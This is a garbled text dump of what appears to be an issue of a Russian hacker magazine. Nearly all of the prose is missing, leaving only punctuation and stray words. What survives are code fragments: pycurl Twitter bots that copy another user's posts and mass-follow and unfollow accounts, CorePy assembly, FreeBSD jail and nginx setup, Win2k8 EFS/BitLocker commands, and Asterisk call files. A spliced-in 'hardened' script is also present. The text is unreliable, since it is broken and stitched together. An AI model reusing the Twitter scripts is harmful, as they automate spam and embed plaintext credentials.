curl.setopt(pycurl.POST,1)
curl.perform()
curl.close()
print data.getvalue()

, , .
spiritua:password , TEXT,
, .

, sys
:
import sys

pycURL , , xakep.ru. :
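curl = pycurl.Curl()
# set the URL to fetch and the callback that receives the response body
curl.setopt(pycurl.URL, 'xakep.ru')
curl.setopt(pycurl.WRITEFUNCTION, data.write)
# send the request
curl.perform()
# close the handle
curl.close()
# print the collected response
print data.getvalue()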

, setopt,
. , ,
socks IP 192.168.1.1, 2222
.
curl.setopt(pycurl.PROXYTYPE,
pycurl.PROXYTYPE_SOCKS5)
curl.setopt(pycurl.HTTPPROXYTUNNEL,1)
curl.setopt(pycurl.PROXY, '192.168.1.1:2222')

TEXT sys.argv[1].
:
sender.py "I love XAKEP"

, ,
. .

,
, ,
. ? , ?
.
, cron (
) .
. API , GET- http://twitter.com/
statuses/user_timeline/spiritua.xml. spiritua
. xml
, :). xml ,

.
xml-, ,
<text>.
, :

<text>(.*)</text>.

Python
re
findall, . :

import re
rez = re.findall("<text>(.*)</text>",data)

:
;
, , ,
, .
, .
,
, ,
.

, ?

,
:

import re, sys, pycurl, StringIO

# buffer that receives the response body
data = StringIO.StringIO()
curl = pycurl.Curl()
# donor is the account whose timeline is read
curl.setopt(pycurl.URL,
            'twitter.com/statuses/user_timeline/donor.xml')
curl.setopt(pycurl.WRITEFUNCTION, data.write)
# send the request
curl.perform()
# status texts from the donor timeline
donor = re.findall("<text>(.*)</text>", data.getvalue())
# empty the buffer before the next request
data.truncate(0)
# user is the account that is posted to
curl.setopt(pycurl.URL,
            'twitter.com/statuses/user_timeline/user.xml')
curl.perform()
# status texts already on the user timeline
my = re.findall("<text>(.*)</text>", data.getvalue())
# post only when the donor's latest status is not there yet
if donor and donor[0] not in my:
    curl.setopt(pycurl.URL,
                'twitter.com/statuses/update.xml')
    # credentials for HTTP Basic Authentication
    curl.setopt(pycurl.USERPWD, 'name:passwd')
    curl.setopt(pycurl.POSTFIELDS, 'status=' + donor[0])
    curl.setopt(pycurl.POST,1)
    curl.perform()
    print 'one update posted'
else:
    print 'no new updates'
# close the handle
curl.close()

warning

!

.
.

links

cURL

http://pycurl.sourceforge.net.
http://apiwiki.twitter.com
API .
www.python.org

Python.
http://python.su/forum
.

dvd

,

,

.

, ID
URL: http://twitter.com/friendships/create/id.format
(format): xml, json
: POST
: id ,
ID ,

: http://twitter.com/friendships/create/bob.xml

1) .
2) .
3) .
, ,
.
,
. ,

. ,
, . ,

, . API , , Get-
URL http://twitter.com/statuses/public_timeline.xml, 20
. , , , ,
.
<screen_name>,
:
<screen_name>(.*)</screen_name>.

20 ,
. , , , ,
,
:).
API, , Post- URL http://twitter.com/friendships/create/
spirit.xml, spirit .
Python,
( ):
curl.setopt(pycurl.URL,
'http://twitter.com/friendships/create/' + name +
'.xml')

curl.setopt(pycurl.USERPWD,'spiritua:passwd')
curl.setopt(pycurl.POST,1)

20 . , , , Cron
, , ( ) (,
, . ).

(
)

URL: http://twitter.com/statuses/update.format
(format): xml, json
: POST
: status ,
. URL- . 140 .


, ,
.
, . ,
, , .
URL:
http://twitter.com/statuses/friends.xml
http://twitter.com/statuses/followers.xml

, :
# configure cURL
curl.setopt(pycurl.URL,
'http://twitter.com/statuses/friends.xml')
curl.setopt(pycurl.USERPWD,'spiritua:passwd')
curl.setopt(pycurl.WRITEFUNCTION, data.write)

# send the request
curl.perform()
# raw XML with the friends list
friends = data.getvalue()
# empty the buffer
data.truncate(0)
# the same request for the followers list
curl.setopt(pycurl.URL,
'http://twitter.com/statuses/followers.xml')
curl.perform()
followers = data.getvalue()

friends, followers
xml, .
<screen_name>, :

friends = re.findall("<screen_name>(.*)</screen_name>",
friends)
followers = re.findall("<screen_name>(.*)</screen_name>",
followers)

, URL http://twitter.com/friendships/destroy/spirit.xml. (
):

# time provides sleep
import time
curl.setopt(pycurl.POST, 1)
# walk the friends list
for friend in friends:
    # friend is not among the followers
    if friend not in followers:
        curl.setopt(pycurl.URL,
        'http://twitter.com/friendships/destroy/'+
        friend+'.xml')
        curl.perform()
        # pause for 2 seconds
        time.sleep(2)

Eclipse

TweetTornado


.
, . , , ,
,
.
. , . - 3 .
, 3
, 100
. ,
- 2000 . ,
.
. z
/ ALEKSEY.CHERKES@GMAIL.COM /

Python CorePy
open source ,
. , , .
,
, .
. : Pythona.
, : ,
, , ,
. Python, , , .
, . ,
. Python
, ,
garbage collector! ,
,
, , ?
CorePy, .

CorePy Python, .
,
Python.
- Python-,
, C. , MMX SSE.
CorePy x86, x86_64 ( SSE),
PowerPC (PPC32 PPC64), VMX/AltiVec Cell SPU.
linux OS X. Microsoft Windows ;).


COREPY :

1) Instruction Set Architectures (ISAs). , .



(, x86 SSE).
2) InstructionStreams . 1.
.
3) Processors.
.
.

InstructionStream.
,
.
! , InstructionStream.
, . CorePy InstructionStream
.
, Processor.

!
- :
Python,
. .
,
N ( 16 )
ASM-
SORT

, O N
(0 < N <= 1000).
!
[Figure: Timeline and (log) Timeline plotted against N; legend: core, psycho, trivial, sort]

. 0 < N <= 7000. ASM


,
SORT -


PSYCO-
, -

[Figure: Timeline and (log) Timeline plotted against N; legend: core, psycho, trivial, sort]

( ,
, ).
:
, , Python
;
, PsyCo;
;
sort, .
timeit. .
PyLab MatLab. , CorePy-, . ,
CorePy printer

.

NASM. ,
:). , , CorePy.
PsyCo Python-
z.
, CorePy
. x86
:).
. corepy.arch.*.isa ( * ).
,
. InstructionStream (

, CorePy

# Platform: linux.spre_linux_x86_32
BITS 32
SECTION .text
global bubble_sort
bubble_sort:
PROLOGUE:
    push ebp
    mov ebp, esp
    push edi
    push esi
    push ebx
BODY:
BEGIN_ALL:
    mov esi, 0
    mov ecx, 0
BEGIN_LOOP:
    mov edi, dword [ebp + 8]
    mov eax, dword [edi + ecx * 4 + 0]
    mov ebx, dword [edi + ecx * 4 + 4]
    cmp eax, ebx
    jle LE
    mov esi, 1
    mov dword [edi + ecx * 4 + 0], ebx
    mov dword [edi + ecx * 4 + 4], eax
LE:
    inc ecx
    cmp ecx, dword [ebp + 12]
    je END_LOOP
    jmp BEGIN_LOOP
END_LOOP:
    cmp esi, 0
    jne BEGIN_ALL
EPILOGUE:
    pop ebx
    pop esi
    pop edi
    leave
    ret

CorePy

import corepy.arch.x86.isa as x86
import corepy.arch.x86.platform as env
from corepy.arch.x86.types.registers import *
from corepy.arch.x86.lib.memory import MemRef

code = env.InstructionStream()
lbl_begin = code.get_label('BEGIN_ALL')
lbl_loop = code.get_label('BEGIN_LOOP')
lbl_le = code.get_label('LE')
lbl_end = code.get_label('END_LOOP')
is_finish = esi # alias: esi is set to 1 when a pass swapped something
x86.set_active_code(code)

# start of a pass: clear the flag and the index
code.add(lbl_begin)
x86.mov(is_finish, 0)
x86.mov(ecx, 0)
code.add(lbl_loop)
# edi = first argument, the address of the array
x86.mov(edi, MemRef(ebp, 8))
# load two neighbouring 4-byte elements
x86.mov(eax, MemRef(edi, disp=0, index=ecx, scale=4))
x86.mov(ebx, MemRef(edi, disp=4, index=ecx, scale=4))
# swap them when they are out of order
x86.cmp(eax, ebx)
x86.jle(lbl_le)
x86.mov(is_finish, 1)
x86.mov(MemRef(edi, disp=0, index=ecx, scale=4), ebx)
x86.mov(MemRef(edi, disp=4, index=ecx, scale=4), eax)
code.add(lbl_le)
x86.inc(ecx)
x86.cmp(ecx, MemRef(ebp, 12)) # end of the array?
x86.je(lbl_end)
x86.jmp(lbl_loop)
code.add(lbl_end)
# run another pass while the last one swapped something
x86.cmp(is_finish, 0)
x86.jne(lbl_begin)

code). add , :

code.add(x86.mov(eax, 0)).


code eax.
. x86 ISA. code.add(),
x86.set_active_code(code)
ISA. code.
,
.
corepy.arch.x86.types.registers.
, : eax, bp .. :
. . is_finish esi.


, , .

. , x86
: , , , , .. . CorePy
MemRef ( ),
. : MemRef(0xABCD)
, MemRef(rip, -1024) ,
IP, MemRef(rsi, disp = 0, index = rcx, scale = 4)
= base + (index * scale) + disp (
). .
. Python .
,
. ,
CorePy, :
for i in xrange(0, 65): code.add(x86_isa.pop(edi))

, copy and paste, , 65 pop-, .


, ,
asm .

Emacs ,
,

. CorePy InstructionStream
: lbl_loop = code.get_label(LOOP).
lbl_loop , code . code
LOOP, . . :
code.add(lbl_loop) .
,
, . ,
, CorePy
: PROLOGUE, BODY
EPILOGUE. , , BODY.
. .
CorePy: ,
bp ..
CorePy .
Python- ExecParams.
: p1, p2, ... , p8
, .
Processor .
: . , ,
eax, : x86.mov(eax, MemRef(ebp, 16)).
. gp_return. ,

.
,
. , array
. Python.
, .
, ,
. array
buffer_info(),
. ,
. CorePy
extarray. array,
, .
.
, Linux huge pages,

, !

,
.
.
N ( )
.
Python- PsyCo- .
, PsyCo , , ,
.
sort
sort
,
. , C,
. , , n**2, bubble sort :).

Python-
, CorePy
.
. , CorePy

. ,
,
:). , , . -
Python-, ,
, ( , ).
CorePy
.
: , ,
. ! z


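import corepy.arch.x86.platform as env
proc = env.Processor()
params = env.ExecParams()
def sort(array):
    # buffer_info() returns (address, number of elements)
    bi = array.buffer_info()
    # p1: address of the array data
    params.p1 = bi[0]
    # p2: index of the last element; the loop compares elements i and i+1
    params.p2 = bi[1] - 1
    proc.execute(code, params = params) # run the assembled code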


>> phreaking

VSHMUK
/ DIVER@EDU.IOFFE.RU /

>> phreaking

,
, , .
.
? .
.
, , . ,
. ?
,
.

: - ( ),
, - .
-, ,
, /. . , ,
. , ,
. ,
. , 36
, 38 40 . , .
, , ,
.
. ,

.
, .
, .
.
-, .

Atmel AT91SAM7X128.
ARM7.
:
USB-. , .


, , .
, , ,
8- ,
AT91SAM7X
. ,
, . , , :
, -;
,
. , - (
8- );
.

- . , /
. , Vishay TSOP18XX ( XX ).
5 3,3 , , ,
.
. ,
. Sony RM-836 36 , ,
TSOP1836, .


( , ). , 3,3
, 220 .
( relay ).
+5V
,

~220V

,
.
-,
,
. -,
5 , 3,3 (
CMOS). ,
,
.
!
, , IRML2803
International Rectifier.
, .
KSD210AC8 Cosmo Electronics (http://
cosmo-ic.com/object/products/KSD210AC8.pdf). ,
, 4 , 5 12 ,
.
, - ( ), .
.
,
, ,
.
.
2-3 , , . ,
!

N-type
MOFSET

5 Ohm

MCU

.
, , -
.


. , , ,
. ,
, OUT GND
.

3
Control
Circuit

Input
PIN

Band
Pass

30
Denodulator

Vs
OUT

/ , ( =*, ?),
. ,
, :). ,
( )
(3,3 ), 220 .

- - ,
GND - . -
. . RC5 ( ), Philips, Sony, Sony.
,
,
.
(
( ,
). ,
). , 1 0,
, , , 0 1. Sony, RC5, .
, (!). , 1, , . -
, (,

, . , ,
, ). ,
. TTL (3,3-5 )
1-0-0, 1-0.
.
.
, .
MOSFET-
- , / , LSB/
, ( ).
, 25TTS
MSB - .
Vishay (http://www.vishay.com/docs/94384/94384.pdf). , ,

AGS


EFM
,
(, )
.
, / .

self-clocking .
, Manchester ( Ethernet) , ,
, .
, .
,
.
- CDROM, 8 14 , ,
, , , . , ,
,
( ) ( ) .
:
http://en.wikipedia.org/wiki/Manchester_code.
http://en.wikipedia.org/wiki/Eight-to-Fourteen_Modulation.

Google . ,
.
( pulse
space) , .

Sony , , .
0,6 , 4 ,
1+2 , 1+1.
:
0 (
, , ).
,
.
1. 2.4 .
, :
2.4 , ;
, - .
[!] , 0,
( ).
0.6 . , . 0.6, . -
, .
1.
,

. 1.2 , ,
0.6 .
(LSB) [!].
7 , 5 .
40 ,

.
, , ,
(, ).

- . , .


ARM7.
, OUT-
, -,
. Datasheet 4.7
, .
-,
.
- , ,
.
!

. ,
, ,
, . ,
. -,
USB UART. ,
, . .
, ,
, , - . , ,
. ,
. , -. z

-
, , . ,

. , , , .
.
(), , - . ,


.
, ,
.


>> phreaking

DOCTOR V_M_E_N
/ YURIK_YUROK2@MAIL.RU /

>> phreaking

, , ,
. , .
,
.
, - Apple
. ,
,
. ,

.
, , ,
, . ,
, .

http://www.xakep.ru/post/22867/default.asp.

. , , ,
.
- , , . ,
- -
. ,
-110.
0.1 . :
(1-1.5 ) 700 .
6 + 800 .
0 . ( )
, 200 .
-110 90 .

, , ,
. , , ,
. ? :


1890-
(http://www.mirf.ru/Articles/art716.htm),
. ! ,
, .

HL2?
, ,
. , , ,
.
. (, :)) .
,
. ? ,
.
( ).
? ,
, . , 15 ,
, ,
, . , ,
300 ,
.
,
. , .

, : ,
.
,
1515 , (,
). ,


. :
, , , .
,
, ! ,
,
10-15
. 10
5 . .


,
. ( -


,




, .
? . .) .
, .
, ? : .
, .
, ,
.

. , , .
, ,
, , , ,
. .

,
. , ,
. .
,
, .
, .
, ,
.

.
,
- .
, , , , ,
. , .
, ,
,
, . ,
.
.
.
, , , , ,
, .
,
,
.


, 100%
, . , , , , .
,
25% 15%.
, , . 50
.


?
,

.
, .
:
.
,
,
. ,
,
( 10
mA) ,
10 .
. ,
,
,

.
,
.

,
10 /,
.
,
.
.

.
, , 10 .
,
.


,
.
.
. ,
,
. ,

,
.
, ,



, . ,

.
, ,
, .
.
,

.
. ,
, .

.
.
, 400
.
.
,
,
. ,

(,
300 20).

220 .
.
. ,
.
, , . ,
,
.

.

. ,
,
,
,
.

25-30 . , ,
, .
, . ?
: CRT-,
.
, .
, ,
, ,

( 900 ).
: ,
. , , , .
( 15%)
.


(
) , ,
. -


:
,
.. ,
,
,
.
.

.

,
, .
,
,
.
,
. ,

, ,
. .
,
, ,
,
-
.

? z

.
1. ,
.
2. .
3. .
4. .
5. (+) ,
(-). :
.
; ; .


>> SYN/ACK
GRINDER
/ CORE@SYNACK.RU /

Win2k8:

>> SYN/ACK

, Win2k8, , -.
, ,
. ,
,
.
EFS
-
. Win2k8
, ,
. , ,
, . EFS (Encrypting File System), Microsoft,
Win2k. , . , Win2k8 -,
,
EFS,
.
Win2k8
AES 256- ( 3DES, DESX). . ,
EFS NTFS, / . FEK (File Encryption Key). FEK
- ( Win2k8
RSA 2048 ). DDF (Data Decryption Field, ) $EFS NTFS.
, , : , . , ,
. (
),

.
, EFS (, , -


FAT32), . .
EFS Win2k8 . (Advanced Attributes), .
(Encrypt contents to secure data) .
,
,
.
cipher.exe, EFS- .
. E () U () .
, cipher /?.
EFS ,
. ,
( ), .
, , . ,
, ,
:). , ,
.
EFS,
.
(Personal) (certmgr.msc).
EFS.

, .
,
Trusted. , .
AD CS (Active Directory Certificate
Services).
.
EFS .
, .

, ,
, . ,
. .
(.pfx). ,

. certmgr.msc. ,
, .

BitLocker,
Vista, Ultimate/Enterprise, , EFS. ( Windows ,
). , , . , EFS,
BitLocker , .
AES 128- .
WMI (manage-bde.wsf)
256 . BitLocker , TPM (Trusted Platform Module). TPM-
, ,
, , .
BitLocker ,
, , , NTFS.

,
( ) ,
Windows. ,
1.5 . , BitLocker . Microsoft
BitLocker Drive Preparation Tool (support.microsoft.com/
kb/933246).
, ,
, .
, TPM, . ,
Windows .

TPM, PIN- USB- .
, : TPM + PIN + USB-. TPM USB-.
TPM
, USB-
PIN-.
BitLocker , . Win2k8
. ,
BitLocker (BitLocker
Drive Encryption). . :
> ServerManagerCmd -install BitLocker -restart

TPM,

TPM (tpm.msc). ,
, .
TPM . BitLocker
BitLocker (BitLocker Drive Encryption), . . ,
BitLocker (Turn On BitLocker)
(USB, ). BitLocker.


BitLocker ,

TPM BitLocker

info
.adm
.admx,

.admx
ADMX
Migrator,

Microsoft.
GPO Win2k3/
Win2k8

ADMX-.
Win2k8 ,

,
-.
BitLocker ,
.

EFS
, EFS
TPM, , ,
, BitLocker.

(gpedit.msc)
Windows
(Group Policy Object Editor Administrative Templates
Windows Component).
BitLocker (BitLocker Encryption)
:
.
BitLocker
TPM. TPM USB-. ,
,
gpupdate.exe /force.
Win2k8 BitLocker (BitLocker-RemoteAdminTool),
BitLocker . :
> ServerManagerCmd -install RSAT-BitLocker


, (Security Templates)
.inf. :
, (


, ,
, ),
, ,
. ,
user10
X Y, . ,
. ,
(Group Policy)
.
Win2k3 (
%systemroot%\security\templates) . , ,
, Secure*.inf-. Win2k8 ,
:
1. Defltbase.inf / .
2. Defltsv.inf , .
3. Defltdc.inf ,
.
: %systemroot%\inf ,
inf.
.
, , dcfirst.
inf .

Win2k8

,
secedit.
, , MMC,
.
, .
,
, , .
, . , .
. ,
gpresult /v,
(RSOP).
GPO (Group Policy Objects), .
, . ,
, .
.

.

,
. *.inf . ,
,
.
MMC . , secedit GenerateRollback:
> secedit /GenerateRollback /CFG Defltsv.inf /RBK Rollback.inf /log RollbackLog.log

MMC

ADM/ADMX
( .adm) . ,
,
GPO, ( ).
ADM- , ,
(GPT). SYSVOL
. . , :).
Vista, Windows

XML .admx, . ADMX , GPO .
SYSVOL .
ADMX . ( ADM), ADMX
ADML. , ADM -,
.
. SYSVOL\Policies C:\Windows\PolicyDefinitions,
ADML- (
en_US ru_RU).
; .
ADM ADMX, ADMX ADMX Migrator, Microsoft. ADMX
XML-, , ADM. z

links

TPM

Wikipedia:
ru.wikipedia.org/wiki/
Trusted_Platform_
Module.


BitLocker (
)
AESCBC +
Elephant
go.microsoft.com/
fwlink/?LinkId=82824.

BitLocker
Microsoft BitLocker
Drive Preparation Tool
(support.microsoft.
com/kb/933246).

GPanswers.
com,
ADM/
ADMX.


>> SYN/ACK
J1M
/ ZOBNIN@GMAIL.COM /


FreeBSD Jail

>> SYN/ACK

FreeBSD
.
. jail,
, .

ftp-, , ,

,

You
are hacked!. , , ,
,
ftp-.
ftp-, ,

.

, .
: ,
.
( ),

,

.

, , ,
.
chroot(2),


,

. ,
/usr/chroot ( )
(
). , , ,

root, .
chroot,
,
, .
,
!

jail
chroot, ,
. , root
:
1. -
(, /dev/
kmem).
2. (
kern.securelevel kern.hostname).
3. .
4. .
5. .
6. raw ( ).
7. , IP- jail.

8. System V IPC ( ).
9.
ptrace(2).
jail , ,
,
.
, . ,
, .
,
.
,
jail, , ,
, . ,
,
( ).
, ,
,

.
. ,
.

FreeBSD
Jail

1. JAIL-
/usr/src :
# JAIL=/usr/jail/base
# mkdir -p $JAIL
# make world DESTDIR=$JAIL
# make distribution DESTDIR=$JAIL
# mount -t devfs devfs $JAIL/dev

/usr/jail/base

FreeBSD, /dev.

2.
. Jail- FreeBSD

IP-
, , -,
, , -, ,
IP
, jail.
IP- :
# ifconfig ed0 inet alias 192.168.0.1/16

,
/etc/rc.conf:
# echo "ifconfig_ed0_alias0=\"inet 192.168.0.1\"" >> /etc/rc.conf

,

IP-, (10.0.0.0/8, 172.16.0.0/12,
192.168.0.0/16), .
.
- jail IP-,
,
IP-.
,
(, ssh
).


info

ipfw
fwd,


IPFIREWALL_
FORWARD.
,
jail

FreeBSD-.
!

, jail-

:
# echo "inetd_flags=\"-wW -a <IP-
>\"">> /etc/rc.conf

, (rpcbind, nfsd, mountd)


IP-,
jail- . IP-
, jail- .
( ssh):
# ipfw add fwd 192.168.0.1,22 tcp from any to
-ip 22

sendmail_enable="NO"
sendmail_submit_enable="NO"
sendmail_outbound_enable="NO"
sendmail_msp_queue_enable="NO"
sshd_enable="YES"

, , ,
exit <Ctrl+D>.
IP- ,
. jail
IP, , ,
, DNS-.
ssh- jail-, , ? PREFIX :
# make PREFIX=/usr/jail/base install clean

3. JAIL-
jail- FreeBSD
/etc/rc. jail
, . :
# jail /usr/jail/base base.jail 192.168.0.1 /bin/sh

:
1. fstab (touch /etc/fstab), .
2. (passwd
root) , , .
3. (newaliases),
sendmail.
4. (tzsetup).
5. /etc/resolv.conf , , jail, DNS-. -, DNS-.
6. /etc/rc.conf :

:
# pkg_add -P /usr/jail/base -1.0.0.tbz

portinstall:
# PREFIX=/usr/jail/base portinstall -P

,
. , jail-

FreeBSD, , .

, .
jail-.
, .
unionfs nullfs /
usr/ports :
# mount_unionfs /usr/ports /usr/jail/base/usr/ports

# vi /etc/rc.conf
# host name of the jail
hostname="base.jail"
# no network interfaces are configured inside the jail
network_interfaces=""
# services switched off and on


# mount_nullfs /usr/ports /usr/jail/base/usr/ports

4. JAIL-
,

Man jail: jail

jail-. /etc/
rc.conf :
# vi /etc/rc.conf
jail_enable="YES"
# list of jails to start
jail_list="base"
# settings of the "base" jail
jail_base_rootdir="/usr/jail/base"
jail_base_hostname="base.jail"
jail_base_ip="192.168.0.1"
jail_base_interface="de0"
# commands run to start and stop the jail
jail_base_exec_start="/bin/sh /etc/rc"
jail_base_exec_stop="/bin/sh /etc/rc.shutdown"
# which file systems to mount inside the jail
jail_base_devfs_enable="YES"
jail_base_fdescfs_enable="NO"
jail_base_procfs_enable="NO"

, jail,
loopback-

,
. , , nginx,
reverse-proxy, jail. , apache, 8080. :
nginx, 80- apache. apache, nginx
jail. ?
nginx ( bash):
# JAIL=/usr/jail/nginx
# mkdir -p $JAIL
# cd /usr/ports/www/nginx
# make PREFIX=$JAIL install clean

, nginx :
# ldd $JAIL/sbin/nginx

/usr/jail/nginx/lib:
:
# /etc/rc.d/jail start base

jail- /usr/
sbin/jls. , , ps
top. J.


jail-, .
. , , ,
,
. ,
,
, , ssh-
. ,
?
,
, , . ,
, , , ,
ls, cd sh.
# mkdir -p $JAIL/lib
# LIBS=`ldd $JAIL/sbin/nginx|grep -v ':$'|cut -f 3 -d " "`
# for LIB in $LIBS; do cp $LIB $JAIL/lib; done

, ld-elf.so.1,
:
# mkdir -p $JAIL/libexec
# cp /libexec/ld-elf.so.1 $JAIL/libexec
# mkdir -p $JAIL/var/run
# ldconfig -s -f $JAIL/var/run/ld-elf.so.hints $JAIL/lib

www:
# echo 'www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin' > $JAIL/etc/passwd
# cp $JAIL/etc/{passwd,master.passwd}
# pwd_mkdb -d $JAIL/etc $JAIL/etc/master.passwd
# echo 'www:*:80:' > $JAIL/etc/group

, :
# mkdir -p $JAIL/var/{log,tmp/nginx}
# chown 80:80 $JAIL/var/tmp/nginx


nginx
Nginx (engine x) HTTP- . HTTP-,
apache,
. wordpress.com
. 2002- .

# mkdir $JAIL/{dev,tmp}
# chmod 1777 $JAIL/tmp    # world-writable with the sticky bit, as for /tmp; 7777 would also set the setuid and setgid bits

devfs:
# mount -t devfs devfs $JAIL/dev

sysctl,

1 security.jail.set_hostname_allowed jail- (hostname) jail-.


,
, DNS-. 2 security.jail.allow_raw_sockets
jail- raw-.
,
, .
3 security.jail.chflags_allowed jail- (chflags). ,
jail , .

IP- HTTP- IP- :


# ifconfig ed0 inet alias 192.168.0.1/16
# ipfw add fwd 192.168.0.1,80 tcp from any to -ip 80

nginx server :
# vi /usr/jail/nginx/etc/nginx/nginx.conf
server {
    listen 80;
    server_name www.host.ru;
    location / {
        proxy_pass http://127.0.0.1:8080/;
        proxy_redirect off;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        client_max_body_size 10m;
        client_body_buffer_size 128k;
        proxy_connect_timeout 90;
        proxy_send_timeout 90;
        proxy_read_timeout 90;
        proxy_buffer_size 4k;
        proxy_buffers 4 32k;
        proxy_busy_buffers_size 64k;
        proxy_temp_file_write_size 64k;
    }
}

,
nginx, /usr/jail/nginx.
, include mime.types; include /etc/nginx/mime.types;. ,
nginx ( -c ):
# jail /usr/jail/nginx nginx.jail 192.168.0.1 /sbin/nginx -c /etc/nginx/nginx.conf


nginx , /etc/rc.conf
:
# vi /etc/rc.conf
ifconfig_ed0_alias0="inet 192.168.0.1"
jail_enable="YES"
jail_list="nginx"
jail_nginx_rootdir="/usr/jail/nginx"
jail_nginx_hostname="nginx.jail"
jail_nginx_ip="192.168.0.1"
# command run inside the jail at start
jail_nginx_exec_start="/sbin/nginx -c /etc/nginx/nginx.conf"
# no stop command is set for nginx
jail_nginx_exec_stop=""
# mount devfs only
jail_nginx_devfs_enable="YES"
jail_nginx_fdescfs_enable="NO"
jail_nginx_procfs_enable="NO"

, .
, ( ,
sshd, , ldd
, lsof). /dev.
,
, , devfs. /etc/defaults/
devfs.rules devfs jail. , /dev/
null /dev/random, . , /etc /etc/rc.conf :
jail__devfs_ruleset="devfsrules_jail"

, devfs.rules
, .
man- devfs(8) devfs.rules(5). z
>> SYN/ACK

SERGEY JAREMCHUK

FEAT ANDREY MATVEEV

IP-PBX Asterisk
Asterisk IP-,
.
Asterisk ,
. , , .

Asterisk ( ) () . ,
:
1. Call- , .
2. API ( 5038)
telnet, .
3. CLI (command line interface)
( asterisk -r).
4. FollowMe.
.call. /var/spool/
asterisk/outgoing ( asterisk.conf astspooldir),
. Call- . Asterisk
; , , .
Call-. autoload=yes (
) modules.conf. extensions.conf,
. , ,
Asterisk
Motion (www.lavrsen.dk/twiki/bin/view/Motion/WebHome),
.
, , . Asterisk :
SIP- (). Motion
/etc/motion/motion.conf ,
,
z 2008 . :
$ sudo nano /etc/motion/motion.conf
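# Built-in HTTP server for the live camera stream
webcam_port 8000
webcam_motion on
webcam_localhost off
webcam_quality 30
webcam_maxrate 6
control_authentication username:password
# Script to run when motion is detected (on_motion_detected fires for every
# motion frame; on_event_start fires once when an event begins)
on_motion_detected /usr/bin/webcam_event.sh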

, Motion 'n':
$ motion -n
Thread is from /etc/motion/motion.conf

,
webcam_event.sh:
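$ sudo nano /usr/bin/webcam_event.sh
#!/bin/sh
cat << EOF > /tmp/alarm.call
# Channel to call and the CallerID to present
Channel: SIP/admin
Callerid: 11111111
# Number of retries after a failed attempt (i.e. 3 attempts in total)
MaxRetries: 2
# Seconds between retries (default 300)
RetryTime: 30
# Seconds to wait for an answer (default 45)
WaitTime: 30
# Context, extension and priority in extensions.conf
Context: alarm
Extension: s
Priority: 1
EOF
# Hand the file over to Asterisk
chown asterisk:asterisk /tmp/alarm.call
mv /tmp/alarm.call /var/spool/asterisk/outgoing/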
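A hardened variant of the call-file step in webcam_event.sh above, as an added example that is not part of the original article: it stages the file under an unpredictable mktemp name in a directory next to the spool (the /var/spool/asterisk/tmp location the article itself uses for wakeup.php) instead of a fixed name in /tmp, rejects field values containing line breaks, and finishes with a same-filesystem rename. The function name queue_call, the CALL_OWNER variable and the staging layout are assumptions.

```shell
#!/bin/sh
# Added example, not the article's script. queue_call, CALL_OWNER and the
# sibling "tmp" staging directory are assumptions made for this example.

# queue_call SPOOL_DIR CHANNEL CALLERID
# Writes alarm.call into SPOOL_DIR and prints its path.
queue_call() {
    spool=$1 channel=$2 callerid=$3
    nl='
'
    cr=$(printf '\r')
    # A line break inside a value would add extra "Key: value" lines
    # (for example Application: or Data:) to the call file.
    for v in "$channel" "$callerid"; do
        case $v in
            ''|*"$nl"*|*"$cr"*) echo "queue_call: bad field value" >&2; return 1 ;;
        esac
    done

    # Stage next to the spool (e.g. /var/spool/asterisk/tmp), not in /tmp:
    # same filesystem, and not writable by other local users.
    stage=${spool%/*}/tmp
    [ -d "$stage" ] || { echo "queue_call: missing $stage" >&2; return 1; }

    # mktemp picks an unpredictable name and creates the file exclusively
    # with mode 0600, so a pre-planted symlink cannot redirect the write.
    tmp=$(mktemp "$stage/alarm.XXXXXX") || return 1

    cat > "$tmp" <<EOF || { rm -f "$tmp"; return 1; }
Channel: $channel
Callerid: $callerid
MaxRetries: 2
RetryTime: 30
WaitTime: 30
Context: alarm
Extension: s
Priority: 1
EOF

    # Asterisk must be able to read and remove the file.
    if [ -n "${CALL_OWNER:-}" ]; then
        chown "$CALL_OWNER" "$tmp" || { rm -f "$tmp"; return 1; }
    fi

    # Within one filesystem mv is a rename(2), so the spooler sees either
    # no file or the complete one.
    mv "$tmp" "$spool/alarm.call" || { rm -f "$tmp"; return 1; }
    printf '%s\n' "$spool/alarm.call"
}

# Usage: CALL_OWNER=asterisk:asterisk queue_call /var/spool/asterisk/outgoing SIP/admin 11111111
```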

, Call-. timestamp:
Set: timestamp=20091023104500

extensions.conf:
$ sudo nano /etc/asterisk/extensions.conf
[alarm]
exten => s,1,Answer()
exten => s,n,Wait(2)
exten => s,n,Playback(activated)
exten => s,n,Wait(1)
exten => s,n,Hangup()

dialplan reload. , , Motion


webcam_event.sh, /tmp/alarm.call
/var/spool/asterisk/outgoing. Call- Asterisk, admin, sip.conf,
CallerID 11111111. , Asterisk , , e-mail
SMS. , Motion ,
.

, Asterisk,
. , Motion , .
cron,
/ . ,
Motion:
$ sudo nano /usr/bin/motion.sh
#!/bin/sh
case $1 in
start)
    /usr/bin/motion
    ;;
stop)
    PID=$(pidof motion)
    kill $PID
    killall webcam_event.sh
    rm -f /var/spool/asterisk/outgoing/alarm.call
    ;;
esac

extensions.conf , :
$ sudo nano /etc/asterisk/extensions.conf
exten => *001,1,Answer()
exten => *001,n,Playback(activated)
exten => *001,n,System(/usr/bin/motion.sh start)
exten => *001,n,Hangup()
exten => *002,1,Answer()
exten => *002,n,System(/usr/bin/motion.sh stop)
exten => *002,n,Playback(de-activated)
exten => *002,n,Hangup()

, Motion,
*001, *002.

ASTERISK *nix
( ,
: sleep 20m && mpg123 ~/bell.mp3),
- .
asterisk wakeup , ,
. PHP-
wakeup.php, (www.voip-info.org/liberty/view/file/2388).
tar-, php- AGI- (Asterisk Gateway Interface ,
Asterisk) : chmod a+x /var/lib/asterisk/agi-bin/wakeup.php (
, astagidir
asterisk.conf).
wakeup.php , :
; PHP *nix
#!/usr/bin/php -q
; /tmp
$parm_error_log = '/var/log/asterisk/wakeup.log';
; /tmp,
, wakeup.php , :
$parm_temp_dir = '/var/spool/asterisk/tmp';

Motion
extensions.conf :
exten => *97,1,Answer()
exten => *97,n,AGI(wakeup.php)
exten => *97,n,Hangup()

*97 , . , 17:55 (
:)), 0555,
2 (1 , 2 ).
,
php5-cli asterisk-sound-extra
fromdos, wakeup.php Unix-.


Asterisk asterisk-sounds
1000 ( Allison Smith). // ,
Audacity.

*98 /tmp myrecord.wav. ( #) , . :
, ,
//,
